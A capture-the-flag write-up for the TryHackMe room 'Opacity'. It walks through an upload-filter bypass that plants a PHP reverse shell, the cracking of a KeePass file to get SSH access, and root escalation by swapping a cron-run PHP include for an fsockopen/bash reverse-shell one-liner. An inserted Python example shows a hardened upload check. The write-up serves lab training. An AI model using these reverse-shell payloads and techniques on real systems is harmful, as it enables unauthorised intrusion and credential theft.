Opacity — TryHackMe — WriteUp
- Difficulty: Medium
Objectives:
Flag 1 : What is the user flag?
Flag 2 : What is the root flag?
Flag 1
command: nmap -sC -sV [Target IP]
We open http://[Target IP]/ in a web browser and find nothing.
We need to find another path.
We use Gobuster.
command: gobuster dir -u http://[Target IP] -w /usr/share/wordlists/dirb/big.txt
We will try to use a reverse shell. You need to edit the original code to specify where you want the reverse shell to connect back to. Edit the following line of php-reverse-shell.php:
$ip = '127.0.0.1'; // CHANGE THIS
Change $ip to your IP, then serve the file with:
command: python3 -m http.server 8080
In External URL use this format: http://[Target IP]:8080/php-reverse-shell.php .png and then click Upload Image.
After the upload completes, go back to the Kali machine and start nc listening on the port you set.
Then copy the image link and open it in another browser tab.
Great! Now all we need to do is wait for the reverse shell.
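The upload check that the "php-reverse-shell.php .png" trick above gets past is a suffix check on the URL string. As an added example (not from the write-up or the room's code; the URL and byte samples are constructed), here is that weak check next to the content-based check a defender would use instead:

```python
"""Added example: suffix check on a remote URL vs. a content-based image check.
The URL sample mirrors the write-up's '.php .png' pattern; the byte samples
are constructed here and are not from the room."""
import hashlib
from typing import Optional, Tuple

# Leading bytes of the image formats the upload is meant to accept.
IMAGE_MAGIC = {
    b"\x89PNG\r\n\x1a\n": "png",
    b"\xff\xd8\xff": "jpg",
    b"GIF87a": "gif",
    b"GIF89a": "gif",
}


def weak_accepts(url: str) -> bool:
    """Vulnerable check: trusts whatever the URL string happens to end with.
    Anything followed by ' .png' passes, regardless of what gets fetched."""
    return url.lower().endswith((".png", ".jpg", ".gif"))


def sniff_image(data: bytes) -> Optional[str]:
    """Return the image type implied by the file's magic bytes, or None."""
    for magic, kind in IMAGE_MAGIC.items():
        if data.startswith(magic):
            return kind
    return None


def hardened_accepts(url: str, data: bytes) -> Tuple[bool, str]:
    """Hardened check: decide from the fetched content, never from the URL,
    and never reuse the remote file name. Returns (accepted, name_or_reason)."""
    kind = sniff_image(data)
    if kind is None:
        return False, "content is not a supported image"
    # A polyglot can carry a valid image header and PHP tags further in, so a
    # magic-bytes match alone is not enough when the web root executes PHP.
    if b"<?php" in data or b"<?=" in data:
        return False, "embedded PHP code"
    # Name the stored file ourselves: content hash plus the detected type's
    # extension, so the URL (and its '.php .png' suffix) never reaches disk.
    name = hashlib.sha256(data).hexdigest()[:16] + "." + kind
    return True, name
```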
We are on the target machine; we go to /home to look for other users and see sysadmin.
We go into sysadmin, run ls, see the file dataset.kdbx, and serve it with python3 -m http.server 8080.
On Kali we download dataset.kdbx:
command: wget http://[Target IP]/dataset.kdbx
command: keepass2john dataset.kdbx > keepass.hash
command: john keepass.hash --wordlist=/usr/share/wordlists/rockyou.txt
Then open dataset.kdbx in KeePassXC with the password recovered by john, and you will see the password of sysadmin.
Then we use SSH to get into the machine as sysadmin.
command: ssh sysadmin@[Target IP]
and use the password from KeePassXC.
Once we are in as sysadmin, let's get the first flag.
command: cat local.txt
Flag 2
After getting the first flag you will see the folder /lib; go into /lib.
Now we copy the file backup.inc.php so we can modify it.
code: $sock=fsockopen("[Your IP]",[port]);shell_exec("/bin/bash <&3 >&3 2>&3");
Remove the original file and replace it with the modified one.
Now we go to Kali and use nc to wait for script.php to run, which triggers backup.inc.php and spawns the reverse shell.
Now you can capture the second flag.